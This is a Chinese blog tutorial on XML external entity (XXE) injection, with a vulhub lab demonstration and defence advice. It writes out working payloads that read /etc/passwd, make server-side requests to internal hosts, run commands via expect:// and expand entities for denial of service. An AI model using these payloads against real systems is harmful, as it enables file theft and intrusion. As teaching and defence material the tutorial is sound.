XXE:XML外部实体注入攻击

最新推荐文章于 2024-06-02 17:38:52 发布
最新推荐文章于 2024-06-02 17:38:52 发布
阅读量1.1k 收藏 21
点赞数 30
分类专栏: 安全 文章标签: xml 服务器 安全 web安全 网络安全 XXE 注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_68163788/article/details/136151386
版权
本文介绍了XML的基本概念,文档结构,包括DTD、元素、属性、实体和PCDATA/CDATA的区别。重点讲解了XML外部实体注入(XXE)漏洞的原理,涉及恶意数据注入、文件读取和系统命令执行的风险,以及防范措施,如禁用外部实体加载和过滤用户提交的XML数据。
摘要由CSDN通过智能技术生成

目录

XML基础知识

XML文档的构建模块

DTD(文档类型定义)

DTD实体

XML注入

XXE注入

利用XXE读取任意文件

利用XXE执行系统命令

防御XXE攻击

XXE(XML External Entity):XML外部实体注入漏洞,想要理解该漏洞的攻击原理,就必须要先明白基础知识,了解xml文档的基础组成。

XML基础知识

XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。

它和前端页面的HTML一样也存在注入攻击,并且注入的方法也是非常的相似的

XML文档结构包括XML声明DTD文档类型定义(可选)文档元素

例如:

<?xml version="1.0" encoding="utf-8" ?>

XML文档的构建模块

所有的 XML 文档(以及 HTML 文档)均由以下简单的构建模块构成:

  • 元素

  • 属性

  • 实体

  • PCDATA

  • CDATA

下面是每个构建模块的简要描述:

1,元素 元素是 XML 以及 HTML 文档的主要构建模块,元素可包含文本、其他元素或者是空的。 比如:

<body>body text in between</body>
<message>some message in between</message>

空的 HTML 元素的例子是 "hr"、"br" 以及 "img"。

2,属性 属性可提供有关元素的额外信息

比如:

<img src="abc.gif" />

3,实体 实体是用来定义普通文本的变量。

实体引用是对实体的引用。

4,PCDATA PCDATA 的意思是被解析的字符数据(parsed character data)。

PCDATA 是会被解析器解析的文本。这些文本将被解析器检查实体以及标记。

<age>libai age > dufu age</age>

5,CDATA CDATA 的意思是字符数据(character data)。

CDATA 是不会被解析器解析的文本。

DTD(文档类型定义)

DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。

DTD 可以在 XML 文档内声明,也可以外部引用。

1,内部声明: ex: <!DOCTYOE test any>

例如:

<?xml version="1.0"?>
<!DOCTYPE note [
  <!ELEMENT note (to,from,heading,body)>
  <!ELEMENT to      (#PCDATA)>
  <!ELEMENT from    (#PCDATA)>
  <!ELEMENT heading (#PCDATA)>
  <!ELEMENT body    (#PCDATA)>
]>
<note>
  <to>George</to>
  <from>John</from>
  <heading>Reminder</heading>
  <body>Don't forget the meeting!</body>
</note>

 

2,外部声明(引用外部DTD): ex:<!DOCTYPE test SYSTEM 'http://www.test.com/evil.dtd'> 

例如:

<?xml version="1.0"?>
<!DOCTYPE note SYSTEM "note.dtd"> //在这里将外部定义好的文档引入了进来
<note>
<to>George</to>
<from>John</from>
<heading>Reminder</heading>
<body>Don't forget the meeting!</body>
</note>

而note.dtd的内容为:

<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>

 

DTD实体

DTD实体是用于定义引用普通文本或特殊字符的快捷方式的变量,可以内部声明或外部引用。

实体又分为一般实体和参数实体

1,一般实体的声明语法: 引用实体的方式:&实体名

2,参数实体只能在DTD中使用,参数实体的声明格式: 引用实体的方式:%实体名

1,内部实体声明:

<!ENTITY eviltest "eviltest">

例如:

<?xml version="1.0"?>
内部DTD实体申明
<!DOCTYPE test [
<!ENTITY writer "Bill Gates //声明
<!ENTITY copyright "Copyright W3School.com.cn">//声明
]>
<test>&writer;&copyright;</test> 调用

 

 2,外部实体声明:

例如:

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY writer SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd"> //外部实体声明,使用system执行
<!ENTITY copyright SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">//外部实体声明,使用system执行
]>
<author>&writer;&copyright;</author>//调用

在了解了基础知识后,下面开始了解xml外部实体注入引发的问题。

XML注入

比如说下面这个代码将会生成一个XML文件:

final String GUESTROLE = "guest_role";
...
//userdata 是准备保存的XML数据,接收了name和email两个用户提交的数据
String userdata = "<USER role = "guest_role"><name>"+
<request class="getParmeter">("name")+"</name><email>"+request.getParmeter("email")+
"</email></USER>"
//保存XML数据
userDao.save(userdata);

但是如果用户构造了恶意输入数据,就会有可能造成注入攻击

比如用户输入了一下数据:

user1@a.com</email></USER><USER
role="admin role"<name>test</name><email>user2@a.com

那么最终生成的XML文件中将会包含两条USER记录:

<USER role = "guest_role">
<name>user1</name>
<email>user1@a.com</email>
</USER>
<USER role = "admin_role">
<name>user1</name>
<email>user2@a.com</email>
</USER>

XML注入需要满足注入攻击的两大条件:

1、用户能够控制数据的输入

2、并且程序拼接了数据

其修复方案也是与HTML转义类似,将字符替换为相应的实体

XML还支持使用CDATA区段来表示纯文本内容,使用方法如下:

<code><![CDATA [if (a < b && a < 0 ) {...} ] ] > </code>

CDATA区段由“<![CDATA ][”开始,以"]]>"结束,他们所波阿伟的字符串都会被解析器当做文本,但是要注意,文本中不能包含字符串"]]>"

XXE注入

在XML中允许自定义实体,在XML的文档类型定义即DOCTYPE 节点中,我们可以使用ENTITY来定义自己的实体,如:

<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY test "hello,world">
]>
<foo>&test;</foo>

其中自定义了test实体的内容是“hello world”,并且这个实体可以在下面的XML元素中被引用。

此时如下java1代码用dom4j去解析这个xml实体,得到foo节点的值是“hello world”,这是xml自定义实体的常规用法,这种实体也叫内部实体。

SAXReader SAXReader = new SAXReader();
Document document = saxReader.read("demo.xml");
Elemnet root = document.getRootElemnet();
System.out.println(root.getText);

但是XML还支持外部实体,使用SYSTEM关键词可以将外部资源作为实体内容,如:

<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY test SYSTEM "file:///etc/passwd">
]>
<foo>&test;</foo>

此时再用上面的java代码去解析,将输入/etc/passwd文件的内容,这种XMl内容中嵌入外部实体的攻击叫做“外部实体注入”。

如果web应用接收用户提交的XML内容,并且在解析后将其中部分内容返回给用户,攻击者将可以通过外部实体注入实现任意文件读取,从而获取服务器上的敏感数据

除了使用file://协议读取本地文件,多数的XML库还支持网络协议读取其他服务器上的资源

攻击者可以用这种方式来实现服务端请求伪造(SSRF),向内部服务器发起攻击,或者读取内部服务器上的资源,例如:

<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY test SYSTEM "http://192.168.159.1/abc.txt">
]>
<foo>&test;</foo>

除了读取文件,在特殊的情况下,服务端还有可能还支持其他危险协议,可以被用来执行更加危险的操作,在PHP中安装expect模块后,就支持使用expect://协议来执行系统命令,如:

expect://ifconfig

此外实体支持嵌套引用,即一个实体可以引用另外一个实体通过构造多级实体引用,可以让实体展开后变成超长的内容,以实现拒绝服务攻击的效果,比如:

<?xml version="1.0"?>
<!DOCTYPE foo [
    <!ENTITY x0 "BOOM!">
    <!ENTITY x1 "&x0;&x0;">
    <!ENTITY x2 "&x1;&x1;">
    <!ENTITY x3 "&x2;&x2;">
    <!-- 这还有&x3...&x97 -->
    <!ENTITY x99 "&x98;&x98;">
    <!ENTITY boom "&x99;&x99;">
]>
<foo>
    &boom;
</foo>

因为外部实体是XML标准的定义,所以更多的XML库都存在漏洞,随着这些库的版本升级,很多库都去掉了引用外部实体的特性,或者默认不启用该特性。但是是有不少XML库需要手动关闭这个特性的,比如PHP中如果使用了libxml库,则需要使用下面的函数关闭加载外部实体

libxml_disable_entity_loader(true);

总:在文本应用中,接收客户端提交的XML内容是非常常见的场景,而且很多标准协议也采用了XML作为数据格式,开发者在使用XML库时最好查询官方文档了解如何进行安全的配置

利用XXE读取任意文件

这里我使用vulhub-master靶场中的xxe漏洞来演示一下XXE漏洞:

下载完源码后,首先就是找到对应的位置:

/root/vulhub-master/php/php_xxe

在运行了docker的前提下,使用下列命令来拉取漏洞环境:

docker-compose  up -d

拉取完成后就可以尝试访问一下:

可以看到一些关于XML的配置和版本信息

由文档可知漏洞环境中的WWW目录下的几个文件分别为:

$ tree . . ├── dom.php # 示例:使用DOMDocument解析body ├── index.php ├── SimpleXMLElement.php # 示例:使用SimpleXMLElement类解析body └── simplexml_load_string.php # 示例:使用simplexml_load_string函数解析body

然后我们在访问 SimpleXMLElement.php文件时抓包,然后将GET方式修改为POST,然后在下面增加提交的数据

xml文件内容:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>

从结果可以看到成功的读取到了/etc/passwd的值

注:这里我们不仅仅可以读取/etc/passwd文件,还可以读取别的文件,但是前提就是需要知道物理路径

利用XXE执行系统命令

提前:安装expect扩展的PHP环境

xml文件内容:

<?php
$xml=<<<EOF
<?xml version = "1.0"?>
<!DOCTYPE ANY [
        <!ENTITY xxe SYSTEM "expect://id"> 
]>
<x>&xxe;</x>
EOF;
$data = simplexml_load_string($xml);
print_r($data);

然后将编辑好的内容赋值到docker容器中:

docker cp abc.php c5369e20a8d8:/var/www/html

然后访问一下该文件,发现是没有安装expect扩展 

注:因为大部分php并不会安装expect扩展的,因此这种利用方式是比较苛刻的

防御XXE攻击

方案一、使用开发语言提供的禁用外部实体的方法

PHP:
libxml_disable_entity_loader(true);
​
JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
​
Python:
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

方案二、过滤用户提交的XML数据

关键词:<!DOCTYPE和<!ENTITY,或者,SYSTEM和PUBLIC。

未知百分百
关注
  • 30
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
xml外部实体攻击
07-17
xml外部实体使用,漏洞产生原因,详细举例攻击原理,修复方法等
xxe-injection-payload-list::bullseye:XML外部实体XXE注入有效负载列表
02-06
XML外部实体XXEXML External Entity Injection)是一种网络安全漏洞,它允许攻击者通过恶意构造的XML输入来访问和泄露服务器内部资源。XXE注入通常发生在应用解析不受信任的XML输入时,没有正确地限制XML解析器...
XXE漏洞--XML外部注入实体攻击初步学习--[NCTF 2019]Fake XML cookbook
qq_75120258的博客
04-25 808
XXEXML External Entity)(XML外部实体注入)是一种针对应用程序处理XML数据的方式的攻击。在这种攻击中,攻击者利用应用程序对XML输入的处理不当,引入或“注入”恶意内容。这可能导致未授权的数据访问、服务拒绝攻击甚至执行远程代码。
JAVA XXE 从原理到利用
2401_83799022的博客
05-31 981
在搜到的文章中有一个令人在意的点,作者提到“由于是java的站,所以利用ftp协议读取文件”,java站和ftp协议有什么关系?简单来说就是将我们原本使用的远程服务器上的dtd变更为了服务器上的本地dtd,去redefine其中的参数实体,再结合报错实现回显。和正常的XXE攻击其实没有太大区别,只是把payload放到了解压后里面的xml中,然后再压缩回到pptx/word/xlsx,上传后在解析过程中就会触发XXE payload。需要关注的是最后一种,参数实体,在实际的XXE攻击中会用到。
针对大模型的上下文注入攻击
最新发布
声纹感知 洞察芯声
06-02 1152
我们探索上下文注入攻击,即注入虚假上下文并随后误导LLMs的行为。更具体地说,我们关注这种攻击如何绕过LLMs的安全措施以产生不允许的响应。这种响应可能带来重大的安全风险,例如错误信息的传播、非法或不道德行为以及技术滥用。
XML外部实体注入攻击XXE
arissa666的博客
10-10 585
(可选)、
[XML外部实体攻击]XXE attack
weixin_34234829的博客
11-07 155
Pnig0s p.s:最近80Sec发表了一篇关于介绍XML实体注入漏洞的警告文章,其实查阅相关资料可以发现XML外部实体攻击相关技术早在02年就在国外被提出,文中明确提到几种编程语言的xml应用中均存在攻击风险,现将原文贴出: http://www.w3.org/TR/REC-xml#include-if-valid]:http://www.docu...
XMLXXE漏洞 XML外部实体注入攻击
qq_60115503的博客
05-24 1245
XXE:XML External Entity即外部实体,从安全角度理解成XML External attack外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者通过ENTITY伪造外部实体构成,比如PHP中simplexml_load默认情况下会解析外部实体,XXE标志性函数simplexml_load_string()
XML外部实体攻击原理以及实战(XXE)(1)
Ba1_Ma0的博客
04-21 1951
extensible markup language(XML)类似于HTML的可扩展的标记语言,但主要区别在于,HTML是关于数据表示的,但是XML是关于数据传输的,XML是可读的,他被用在很多地方,比如API,UI布局,android应用程序配置文件,RSS等
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXEXML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞。XML是一种标记语言,常用于数据交换,而外部实体XML文档的一部分,允许引用外部资源,如文件系统、网络...
测试XXE注入.docx
09-06
XXE 注入XML 外部实体注入)是一种类型的注入攻击,它会影响解析 XML 文件的应用程序。攻击者可以通过构造恶意的 XML 文件,使用外部实体来引用文件系统中的文件或网络资源,从而导致读取任意文件、执行系统命令、...
你所不知道的XML安全XML攻击方法小结
01-30
XML可扩展标记语言,被设计用来传输和存储数据,其形式多样。某些在XML中被设计出来的特性,比如 XMLschemas(遵循XMLSchemas规范)和documentstypedefinitions(DTDs)都是安全问题来源。纵然被公开的讨论了上十年,还是有一大批一大批的软件死在针对XML攻击上。XML可扩展标记语言,被设计用来传输和存储数据。其形式多样例如:1.文档格式(OOXML,ODF,PDF,RSS,DOCX...)2.图片格式(SVG,EXIFHeaders,...)3.配置文件(自定义名字,一般是.xml)4
WebGoat8-xxe注入漏洞分析
09-15
XXE 注入漏洞是基于 XML 外部实体攻击攻击者可以通过构造特殊的 XML 实体来读取服务器上的敏感信息。XML 外部实体XML 1.0 中的一种特性,允许开发者在 XML 文档中引入外部实体,以便在 XML 文档中使用外部...
信息安全_xxe注入应用与拓展.pptx
08-14
XXE,全称为XML External Entity Injection,是针对XML解析器的一种安全漏洞,它利用XML文档中的外部实体(External Entity)来获取系统敏感信息或执行恶意操作。XML实体允许开发者引用外部资源,如本地文件、网络...
网络安全-XXEXML外部实体注入)原理、攻击及防御_c# 如何防止xml外部实体注入
2401_84264491的博客
05-09 343
XML外部实体注入(XML External Entity,为什么不取首字母呢…),简称XXE漏洞。
XML实体注入攻击
Lethe's Blog
08-15 1426
0x01 基础知识 一、XML XML教程 1、什么是 XML? XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 的设计宗旨是传输数据,而非显示数据 XML 标签没有被预定义。您需要自行定义标签 XML 被设计为具有自我描述性。 XML 是 W3C 的推荐标准 2、XML 与 HTML...
Java代码审计安全篇-XXE(XML外部实体注入)漏洞
dzqxwzoe的博客
05-29 1007
XML 实体允许定义标记,在分析 XML 文档时,这些标记将被内容替换。通常有三种类型的实体:内部实体外部实体参数实体。必须在文档类型定义 (DTD) 中创建一个实体,让我们从一个示例开始:正如你所看到的,一旦XML文档被解析器处理,它就会用定义的常量“JoSmith”替换定义的实体。正如你所看到的,这有很多优点,因为你可以在一个地方更改为例如“约翰史密斯”。js ``js在 Java 应用程序中,XML 可用于将数据从客户端获取到服务器,我们都熟悉 JSON API,我们也可以使用 xml
XML注入攻击总结
热门推荐
qq_32238611的博客
09-08 1万+
XML注入攻击总结普通的XML注入 普通的XML注入 原理 XML注入攻击和SQL注入攻击的原理一样,利用了XML解析机制的漏洞,如果系统对用户输入"<",">"没有做转义的处理,攻击者可以修改XML的数据格式,或者添加新的XML节点,就会导致解析XML异常,对流程产生影响。 如何注入攻击 如下XML是用于注册访问用户,其中用户名是由用户自己输入的。 <?xml version="1.0" encoding="UTF-8" ?> <user role="gues
xml攻击 简介、示例、防范
weixin_42100211的博客
04-28 1928
在查找openpyxl的官方介绍时,注意到security这一栏提到了针对xml解析器的攻击。 介绍了什么是xml实体,各种xml实体攻击的基本思路,和其中一种xml攻击的demo。
XML外部实体注入漏洞原理
05-24
XML外部实体注入漏洞(XML External Entity Injection, 简称XXE)是一种常见的安全漏洞,攻击者可以利用这种漏洞来读取任意文件、执行系统命令等操作。 在XML文档中,可以通过定义实体来引用外部资源,例如文件、URL等。当XML解析器解析XML文档时,如果不对外部实体进行限制,攻击者可以通过构造恶意的XML文档,将外部实体指向敏感文件或者恶意URL,从而导致漏洞。 具体来说,攻击者可以在XML文档中定义一个实体,使用DTD(Document Type Definition)语法将该实体指向一个外部文件,然后在XML文档中使用该实体。当XML解析器解析该实体时,就会将指定的外部文件读取进来,从而导致漏洞。 例如,下面的XML文档定义了一个名为“file”的实体,指向了一个敏感文件“/etc/passwd”: ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE message [ <!ELEMENT message (#PCDATA)> <!ENTITY file SYSTEM "file:///etc/passwd"> ]> <message>&file;</message> ``` 如果XML解析器不对外部实体进行限制,那么解析该文档时就会读取“/etc/passwd”文件的内容,并将其包含在<message>元素中返回给应用程序,从而导致敏感信息泄漏。 为了防止XXE漏洞,可以采取以下措施: 1. 禁止使用外部实体,或者限制外部实体的使用范围。可以在XML解析器中设置相关参数,例如禁止加载外部实体、禁止解析DTD等。 2. 对外部实体进行白名单过滤,只允许加载特定的URL或文件。 3. 检查输入数据,避免恶意输入注入XML文档中。 4. 对于持久化的XML数据,应该使用安全XML库来处理,例如使用DOM4J或JAXB等库,这些库会自动过滤掉外部实体

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

未知百分百

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值